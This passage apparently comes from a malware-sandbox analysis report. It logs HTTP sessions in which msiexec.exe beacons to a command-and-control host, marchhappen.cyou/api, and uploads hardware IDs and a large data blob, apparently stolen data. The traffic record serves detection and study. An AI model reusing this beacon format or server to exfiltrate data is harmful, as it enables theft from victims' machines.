                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e80c217ebaac43b-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1637&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2840&recv_bytes=9662&delivery_rate=1795817&cwnd=187&unsent_bytes=0&cid=2412da6721e80d9f&ts=780&x=0"
                                                                                            2024-11-25 09:54:35 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                            Data Ascii: eok 8.46.123.75
                                                                                            2024-11-25 09:54:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.449740104.21.2.2244432232C:\Windows\SysWOW64\msiexec.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-25 09:54:37 UTC274OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=AWZPLICSBP
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 20391
                                                                                            Host: marchhappen.cyou
                                                                                            2024-11-25 09:54:37 UTC15331OUTData Raw: 2d 2d 41 57 5a 50 4c 49 43 53 42 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 41 32 32 36 38 41 34 32 31 37 46 46 34 38 32 33 41 37 46 44 44 43 39 35 42 33 43 33 36 41 0d 0a 2d 2d 41 57 5a 50 4c 49 43 53 42 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 57 5a 50 4c 49 43 53 42 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 0d 0a 2d 2d 41 57 5a 50 4c 49 43 53 42 50 0d 0a 43 6f 6e 74 65 6e
                                                                                            Data Ascii: --AWZPLICSBPContent-Disposition: form-data; name="hwid"58A2268A4217FF4823A7FDDC95B3C36A--AWZPLICSBPContent-Disposition: form-data; name="pid"3--AWZPLICSBPContent-Disposition: form-data; name="lid"MeHdy4--pl8vs06--AWZPLICSBPConten
                                                                                            2024-11-25 09:54:37 UTC5060OUTData Raw: 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0
                                                                                            Data Ascii: lrQMn 64F6(X&7~`aO@d
                                                                                            2024-11-25 09:54:38 UTC1015INHTTP/1.1 200 OK
                                                                                            Date: Mon, 25 Nov 2024 09:54:37 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=las9891j4slphbrm0e9399jgbj; expires=Fri, 21-Mar-2025 03:41:16 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CDfhFkFvw5WdbXqZ3jXy0AfJ%2BJA3V%2BlqWl8E1YZtN1VD4kvWLrnfq15IGgwEDL3S%2FOzAqGdj22TcNkHNTSUHWYxgCVld5v1%2FzForVV4CYd3QT1JjP02lzKYf9edoykr%2BUU7H"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e80c226ef9f43c7-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1686&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21345&delivery_rate=1703617&cwnd=211&unsent_bytes=0&cid=05e73be206d2a731&ts=910&x=0"
                                                                                            2024-11-25 09:54:38 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                            Data Ascii: eok 8.46.123.75
                                                                                            2024-11-25 09:54:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.449741104.21.2.2244432232C:\Windows\SysWOW64\msiexec.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-25 09:54:40 UTC274OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=3JYEH0QNJIX
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 1215
                                                                                            Host: marchhappen.cyou
                                                                                            2024-11-25 09:54:40 UTC1215OUTData Raw: 2d 2d 33 4a 59 45 48 30 51 4e 4a 49 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 41 32 32 36 38 41 34 32 31 37 46 46 34 38 32 33 41 37 46 44 44 43 39 35 42 33 43 33 36 41 0d 0a 2d 2d 33 4a 59 45 48 30 51 4e 4a 49 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 4a 59 45 48 30 51 4e 4a 49 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 0d 0a 2d 2d 33 4a 59 45 48 30 51 4e 4a 49 58 0d 0a 43 6f
                                                                                            Data Ascii: --3JYEH0QNJIXContent-Disposition: form-data; name="hwid"58A2268A4217FF4823A7FDDC95B3C36A--3JYEH0QNJIXContent-Disposition: form-data; name="pid"1--3JYEH0QNJIXContent-Disposition: form-data; name="lid"MeHdy4--pl8vs06--3JYEH0QNJIXCo
                                                                                            2024-11-25 09:54:42 UTC1011INHTTP/1.1 200 OK
                                                                                            Date: Mon, 25 Nov 2024 09:54:42 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=usn73jji1mm0jg0ngdino6s9ei; expires=Fri, 21-Mar-2025 03:41:20 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TmeW02DrXReovbQfXgTN%2FrtNXK9SHFC5qmgwUfMg4C9B8ydpv7dMGQK5HeNfa0y1Z08CzXz%2FHgWxKMRg8RXKb0hdwCMFZv18E9uE2sY6JGJ4YZ%2FmEOPnnH%2Fto9DyHjPwAO2A"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e80c23dde534241-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4499&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2125&delivery_rate=1626740&cwnd=216&unsent_bytes=0&cid=4391fc7fe9fee188&ts=1922&x=0"
                                                                                            2024-11-25 09:54:42 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                            Data Ascii: eok 8.46.123.75
                                                                                            2024-11-25 09:54:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.449743104.21.2.2244432232C:\Windows\SysWOW64\msiexec.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-25 09:54:44 UTC277OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=TEDY2270QJS4
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 553634
                                                                                            Host: marchhappen.cyou
                                                                                            2024-11-25 09:54:44 UTC15331OUTData Raw: 2d 2d 54 45 44 59 32 32 37 30 51 4a 53 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 41 32 32 36 38 41 34 32 31 37 46 46 34 38 32 33 41 37 46 44 44 43 39 35 42 33 43 33 36 41 0d 0a 2d 2d 54 45 44 59 32 32 37 30 51 4a 53 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 45 44 59 32 32 37 30 51 4a 53 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 0d 0a 2d 2d 54 45 44 59 32 32 37 30 51 4a 53 34
                                                                                            Data Ascii: --TEDY2270QJS4Content-Disposition: form-data; name="hwid"58A2268A4217FF4823A7FDDC95B3C36A--TEDY2270QJS4Content-Disposition: form-data; name="pid"1--TEDY2270QJS4Content-Disposition: form-data; name="lid"MeHdy4--pl8vs06--TEDY2270QJS4
                                                                                            2024-11-25 09:54:44 UTC15331OUTData Raw: 36 7e 60 f2 29 70 3c 9c aa 7c ff 3c 02 ea 0d 51 1a 0a df 8d 1b 06 3c c9 31 b1 fe 3f 97 11 f6 55 00 4d 5c ce cd b6 f8 cb 80 ed 93 7c 74 1a 5b 41 cc 74 81 ee 69 2c 10 bb a2 0e 2b e5 13 92 43 7c 0b ce 3a 0b 0a 04 48 13 d7 6f 8c 9f 88 13 a0 cd 17 ab 4f c5 df 09 b7 db 88 08 38 16 b6 97 61 f4 87 90 ad b3 f3 41 94 71 10 5e 1f 94 74 04 f9 4f e6 41 70 36 54 29 85 3f d2 0c 17 ee 07 0e 5a 9d 80 5c cd f3 16 44 aa 6f 5c 5a 14 b8 f1 6f cb c7 01 97 be b1 be 77 69 23 f6 43 4e ef d0 a1 9a f5 1b 57 a9 50 81 7d 45 87 49 c9 d5 c4 10 d7 c9 b4 28 14 dc bb df 47 c4 08 13 8a 4c 3b 31 34 2d 07 03 92 fc e3 a9 b9 a0 38 d8 d1 65 cd a1 41 03 3f 1d b0 74 f0 7d 9f 1e d8 6e 2c bf fb e6 d4 e8 e0 c5 dd fd de 37 4e f6 4a f7 4e 8e 29 da bf 75 28 a9 ca 7e 63 53 51 f0 df c5 b4 d9 c3 ff 00 ad
                                                                                            Data Ascii: 6~`)p<|<Q<1?UM\|t[Ati,+C|:HoO8aAq^tOAp6T)?Z\Do\Zowi#CNWP}EI(GL;14-8eA?t}n,7NJN)u(~cSQ
                                                                                            2024-11-25 09:54:44 UTC15331OUTData Raw: 2d b5 4e a4 d4 4b 74 61 6a b5 14 de b6 06 e3 03 86 6b a9 26 dc ef 1f c7 e3 ca 46 27 a7 a7 a3 eb f4 27 94 9c 55 c0 4e c7 08 88 20 b7 0f 4f b5 0c 24 aa 28 29 46 c4 fd 7a 7f e2 98 7c a4 81 53 97 21 ce ef b8 0a 9f 1f 2f 5f ad ab 83 7b d4 58 f6 eb 5d 06 81 ff ae 9a f5 b4 c0 ab 12 1e 1e cd cf 23 1e 8b e6 17 5a 53 ea 5b 12 da d9 24 a7 fd 6a a3 f6 51 1c 41 0e 25 b4 07 67 f2 50 77 49 bc 52 e5 95 60 6a cb 9d d0 da 3d f9 93 72 fd fc df d5 b3 26 af 8c fe 3e 1b 7d 35 3d 64 1f df dd 20 d1 3e 6a b3 e1 f3 c6 68 d8 5f fc 97 62 ed 54 08 3f fa 27 b3 7b dd e9 8a df a3 4c 43 44 67 96 68 56 6e 8b ac d0 fa 70 ec b1 21 a8 3b 6a 4b e4 e9 8e 02 95 74 96 f2 04 2f 5d 24 43 e2 05 3b 58 34 5d 8c 39 be 39 cb ed 7e cf d1 6f 35 c1 7b e8 ff da 61 da da 49 7f 50 02 f1 2f ca 2e 5e 9f b7 19
                                                                                            Data Ascii: -NKtajk&F''UN O$()Fz|S!/_{X]#ZS[$jQA%gPwIR`j=r&>}5=d >jh_bT?'{LCDghVnp!;jKt/]$C;X4]99~o5{aIP/.^
                                                                                            2024-11-25 09:54:44 UTC15331OUTData Raw: 76 73 37 3d ca fa d3 b3 bd 9f d0 30 a3 72 c9 e5 c0 c6 8b 7e 81 9e cc 8a cf 23 35 15 2f ff 61 31 b9 f9 b1 a7 ab a7 56 fe 38 31 a9 cd e7 84 ba c6 7e 6e fd a6 fa 1a bb db bc e2 5c fb b4 3f 93 9a b7 17 38 0a 17 01 cc ad d3 c0 f1 c2 0e 9e 9d 3a bd b2 85 c2 2c b7 61 09 56 e9 81 36 0e 47 1d 1f 6e f3 75 fd d1 bd 08 ab 09 b9 c9 02 69 20 1b 13 72 cb 6b 1e a2 db 85 da 1b 7c 50 c7 cf f4 be 21 b7 99 3c 0d b7 d0 02 0e 1f 7f 6d 20 3e c2 14 78 c8 ff 7f 47 a0 23 99 a3 10 28 43 43 4d 06 e0 5a 59 2e 22 b2 24 22 35 4b 51 e0 42 c8 53 6d be 35 ba b8 2a f6 d5 2b c5 21 ad 1f 80 b0 87 e8 88 79 86 25 7e 99 74 f5 e0 06 16 3f 31 8c 52 41 81 c4 8f 9c 10 9b 08 9b c4 50 c3 26 ab d2 20 da f8 6c e3 82 ab 01 eb 2e dd f5 c6 4d e3 de 19 c3 b5 3e 62 4c e4 60 8e 00 fd 8c 0c 8c 26 f8 9c 75 e1
                                                                                            Data Ascii: vs7=0r~#5/a1V81~n\?8:,aV6Gnui rk|P!<m >xG#(CCMZY."$"5KQBSm5*+!y%~t?1RAP& l.M>bL`&u
                                                                                            2024-11-25 09:54:44 UTC15331OUTData Raw: 2e d3 97 e7 bd b4 ed 69 84 79 be 8c 7c ed 02 98 4a 98 13 f2 6a 7e 8f 19 cb 48 34 b5 27 fe 1b 89 40 53 43 c5 f6 48 63 e7 51 9e 68 f3 76 94 b9 93 c6 af cb f8 97 7e 5b ef 41 74 c7 b9 00 56 1f 82 c4 32 02 98 be e9 74 9b 35 33 bb f3 e4 ea 09 ce 35 03 3c 7e 4a 37 f8 ab 64 20 96 07 23 8c e9 55 18 47 33 a2 8a ba 8d e6 64 3f 58 33 9a 8c b1 e1 42 8d f2 56 ee 99 4e 49 a3 23 e3 77 66 86 2a e2 37 5f 0a 50 f8 39 77 46 83 b1 f5 a4 da eb 4c 66 c4 df 83 e4 3a 89 48 e3 3a 04 3b 10 26 51 8e ba 44 a4 f5 a1 19 71 e5 ea e9 f0 3d be a5 a7 7c 2a 92 c9 96 f6 19 09 38 21 c1 fd 8c 92 3d bb 74 b8 a4 ef b2 a6 37 9e 49 44 1e e6 33 a9 fa b1 d2 a4 75 73 35 b3 75 8b 3b ac 49 07 23 04 5e 0f a8 8d 67 bd e1 02 7f be 8e 3d 89 ac 31 d2 cd 4a e0 15 02 b7 27 a0 c5 73 a6 99 09 a2 b1 cf 17 ce 25
                                                                                            Data Ascii: .iy|Jj~H4'@SCHcQhv~[AtV2t535<~J7d #UG3d?X3BVNI#wf*7_P9wFLf:H:;&QDq=|*8!=t7ID3us5u;I#^g=1J's%
                                                                                            2024-11-25 09:54:44 UTC15331OUTData Raw: 7b 18 f5 fc b0 ac 28 70 6c 92 1b 8a d4 f9 fa 6d c9 32 bd a2 a3 29 9e 73 45 58 fc c7 df dc 0e 57 ec 1d 38 c8 1f 3a 81 09 f5 47 fd 58 c0 c5 66 d5 99 d0 cc c3 26 42 24 38 f3 4f 02 2b bd 58 09 2a d7 c6 c1 b2 6f 7a 45 61 f6 6e 19 d8 10 03 bf e4 62 d7 47 89 0e b6 bd 3a 4b ac ae ef 96 b0 bd f0 c2 8b a7 ff 3b 4c 73 3d 03 7b 87 4b 5a 84 fe 0a b1 13 55 65 22 a9 b0 cd 58 ad 28 cb 6e 5d ad f6 19 ca 50 f7 c3 bc d7 07 f7 67 9f b9 80 be b9 c6 38 b3 33 53 e4 2a 74 93 aa ae b9 8c 9e 45 2f e7 cc d8 1c 25 d3 59 4b aa b4 31 00 de a2 19 f3 ac 3e 52 9a 08 20 ec 11 8b 52 e2 66 37 6c af 0d fe bb 2e 39 52 c3 ec 9c fa 99 20 77 dc 19 de 07 1a 54 76 f6 3b cc b6 40 18 70 48 8a 21 df 00 53 c3 2e 71 81 07 e2 0c 3d 44 da dd bd be ef fd d6 ec dd 26 26 55 88 bd f1 6b ab 92 96 e5 17 6f b2
                                                                                            Data Ascii: {(plm2)sEXW8:GXf&B$8O+X*ozEanbG:K;Ls={KZUe"X(n]Pg83S*tE/%YK1>R Rf7l.9R wTv;@pH!S.q=D&&Uko
                                                                                            2024-11-25 09:54:44 UTC15331OUTData Raw: b4 8b 38 02 0c 9b c2 21 ec 28 2e 6a 72 c4 47 eb f9 c7 b1 78 97 3b 81 df 8e 3c 5a da ca f4 32 de 27 b2 e1 e5 28 a0 50 dd f3 d2 1b 53 34 7c 19 87 47 7c ff 9d 8e 1d 2b 5e 30 27 f1 7f dd 6c 47 d4 01 69 a7 2a a3 9b d9 e6 a9 be 4f 1c 5c f9 27 75 47 ac 33 0f a2 48 10 26 94 f6 d8 23 c7 e6 6b 21 30 fb 2c 14 22 ca 65 29 43 8e c2 bd 27 39 5a e7 d2 b8 f7 7a d0 31 7d 78 97 8b c4 40 de fb 91 16 6d 9b 9a b5 a2 59 1e 72 25 6b 9a 99 23 d4 29 1a ee 22 59 1c 51 7d 04 58 8c 66 6a a0 be 63 7b ff d2 86 2b 1a ae e2 20 b5 06 6c ec d5 c8 72 c8 da d1 5e 02 f0 d4 38 41 c4 a1 10 3c ab d8 39 3b 4b 64 92 75 78 f0 fb 15 4a e5 ae db 4a cc 91 09 96 a5 58 16 36 ec e7 af 56 ff df 05 be cc c3 cc 92 e2 63 c2 0b 97 63 32 75 30 c6 e7 c9 be bc b3 32 71 86 e2 58 8e 34 f4 7a 24 6e b6 38 46 5c 75
                                                                                            Data Ascii: 8!(.jrGx;<Z2'(PS4|G|+^0'lGi*O\'uG3H&#k!0,"e)C'9Zz1}x@mYr%k#)"YQ}Xfjc{+ lr^8A<9;KduxJJX6Vcc2u02qX4z$n8F\u
                                                                                            2024-11-25 09:54:44 UTC15331OUTData Raw: 17 0d 6c 7a b3 8b 3b da d1 6d 7f 0c 05 83 c0 23 28 c3 61 6f e9 a5 62 b9 94 11 97 53 9b d2 08 cf 65 e7 4c e3 26 f4 29 44 68 24 d6 0b a9 4e 5d cd 4e dd f5 06 03 5c ce af cb b1 e2 9d f1 f2 c1 df 7d 61 6d 7c 71 d2 37 df a1 fc 6b 53 19 2c bd 1d 7b 59 44 46 13 ba 49 56 11 c1 54 ec 35 48 d8 a8 e2 10 ee e5 98 ee ef 1f 89 a2 28 8c de 5a 25 57 1e e7 e8 d5 57 73 53 fe 01 3d 8a 90 86 d1 31 ad 95 ea 65 0f 6b 4b 9c 98 c8 b0 fa 94 10 ce ed e3 4f 2e b0 2a 1d 9c 3a 92 7b 24 34 f9 c8 c9 f3 ff 4e 9b b1 48 eb a2 3b ec 88 92 6f 6c b1 6d b3 72 51 2b 3d a7 a1 8c 6c 9f c4 9d 17 97 a6 0d 47 3f d9 41 9f 79 9e c0 67 b1 60 5e b8 2f fd 1c d0 5a 38 40 2c 41 20 8e f2 6e ca f6 5f 49 1b c0 02 72 38 74 8e 0f 94 5b b9 ff f2 76 3f f9 04 74 1e e1 c4 d8 a4 45 e4 9f ba e5 41 74 6a 70 f4 cb aa
                                                                                            Data Ascii: lz;m#(aobSeL&)Dh$N]N\}am|q7kS,{YDFIVT5H(Z%WWsS=1ekKO.*:{$4NH;olmrQ+=lG?Ayg`^/Z8@,A n_Ir8t[v?tEAtjp
                                                                                            2024-11-25 09:54:44 UTC15331OUTData Raw: a8 0e fd c8 1f ef 7c b7 2e 6b cb 4f 54 9b 13 34 05 80 04 56 2a d5 3d 4f 8d b0 a0 a7 67 84 3e 7a b7 41 7f e8 c4 80 6f fa 93 d6 ee cf 0f f3 cd 04 79 b7 e6 ed 3f 19 51 ff 77 4b 4c 10 84 f8 2c 2e a2 81 36 fe 0a 0e bc 45 17 0a a0 86 c9 64 c9 7f 82 d3 b4 7d 12 37 8f d5 58 1a f3 fb ea 20 18 30 e0 04 39 47 96 da 8b a2 07 38 14 2a 0d 73 25 0f f7 4b 8d b8 c6 63 47 54 e9 02 18 6d 96 67 34 35 18 e0 d7 1f b3 c6 56 00 9f 8a f9 e0 71 91 37 5b 71 fb a6 ad d0 bc 76 3e 7c 66 ce 54 cd 89 53 9b cf 2a 52 8d 79 05 c7 c4 ef 41 b0 51 b7 fe fa 15 07 09 d4 f5 84 09 08 dc 20 e0 1a 70 f5 ca 51 21 bb a9 fc 00 c2 41 2b c4 bd a1 3b b9 76 ad 39 b3 64 17 1b 53 a7 11 ec 65 4b bc 07 e6 35 3a 89 90 74 b0 c6 18 9d b4 89 28 c0 6d 9f cd 49 a0 0b 08 fc 9a b2 29 b4 b1 b5 0d cc dc 1b 5b fe c5 6b
                                                                                            Data Ascii: |.kOT4V*=Og>zAoy?QwKL,.6Ed}7X 09G8*s%KcGTmg45Vq7[qv>|fTS*RyAQ pQ!A+;v9dSeK5:t(mI)[k
                                                                                            2024-11-25 09:54:44 UTC15331OUTData Raw: 6f 4a 4e 98 5a 7e 8a e6 df e0 f3 21 a0 6b af a3 09 67 f8 af 49 0a 3a ce eb d3 04 be da ff df 4b 6f ac e3 f4 4e 66 42 7c 4c 62 d9 4e 43 5e e6 5d 35 2f 41 c4 1b b3 e8 b1 c6 44 c0 b0 3b 0a f2 0f cf a8 40 f9 bf cc 98 ee 0e c3 17 af 7e 11 ad dc 79 b3 98 ad 81 80 c8 2f ae a9 a7 bd 59 57 f3 c3 19 09 f9 4b 35 13 2e 53 f0 44 6d 13 a9 02 ad 2e 60 d9 ba 23 f4 28 0c c3 d4 a0 18 b5 42 53 9c b7 fb f5 e5 22 95 94 09 00 3b 39 7a c7 f9 1b 43 be b3 03 3d 3d a4 0f b8 ce 1f 18 ad 09 ef b9 2d e0 18 b4 f0 6a de 5e 85 d8 42 cf f2 18 ac 94 1b 2c b9 eb 92 2f b6 30 10 26 15 e9 dd ac dc 31 b6 54 ac 4d 8f a2 d6 cd 7a e4 85 20 dc 0b 18 fb 73 7d ec 15 61 10 e2 3d 37 2b 0f 87 f9 41 af 35 93 26 3e ec 49 81 45 1d 3f 51 25 59 b3 7d 15 dc f7 92 41 4e bb c9 36 2c 8f 11 68 fd b9 a6 0b c5 7b
                                                                                            Data Ascii: oJNZ~!kgI:KoNfB|LbNC^]5/AD;@~y/YWK5.SDm.`#(BS";9zC==-j^B,/0&1TMz s}a=7+A5&>IE?Q%Y}AN6,h{
                                                                                            2024-11-25 09:54:46 UTC1013INHTTP/1.1 200 OK
                                                                                            Date: Mon, 25 Nov 2024 09:54:46 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=5hj6omggea4tf6ofgmvjlucjv6; expires=Fri, 21-Mar-2025 03:41:25 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9eTftDTubNcwQsl8gzdib64QjYeaG%2BVH3EJtVOEjINHz0VwIh4c4ltWGszVGuD2TO5RFjr55RzRXLUGGqsQjkKJqFseARVKdik0CWqK9f6agEExbUhjyoMZyT%2BmC28vkHIlg"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e80c25528bf4406-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1704&sent=341&recv=575&lost=0&retrans=0&sent_bytes=2840&recv_bytes=556131&delivery_rate=1656267&cwnd=186&unsent_bytes=0&cid=8889e18d10d18cae&ts=2280&x=0"


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.449755104.21.2.2244432232C:\Windows\SysWOW64\msiexec.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-25 09:54:48 UTC264OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 84
                                                                                            Host: marchhappen.cyou
                                                                                            2024-11-25 09:54:48 UTC84OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 26 6a 3d 26 68 77 69 64 3d 35 38 41 32 32 36 38 41 34 32 31 37 46 46 34 38 32 33 41 37 46 44 44 43 39 35 42 33 43 33 36 41
                                                                                            Data Ascii: act=get_message&ver=4.0&lid=MeHdy4--pl8vs06&j=&hwid=58A2268A4217FF4823A7FDDC95B3C36A
                                                                                            2024-11-25 09:54:48 UTC1005INHTTP/1.1 200 OK
                                                                                            Date: Mon, 25 Nov 2024 09:54:48 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=q3hnhtpm3kfu49ak92od0od0ft; expires=Fri, 21-Mar-2025 03:41:27 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NrFAl5iVkMgER0PdBX0Iq4KQu%2B1SsBV1dWmDMNLZJ5VGSYg7KnqVc4ZO5B19qWFUHTan6hd4MPjHv3bmKJHHgS0%2BDCTXIJJ7HnjDAY6LLgJiMGqL6EncZIbD84accHQjcutU"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
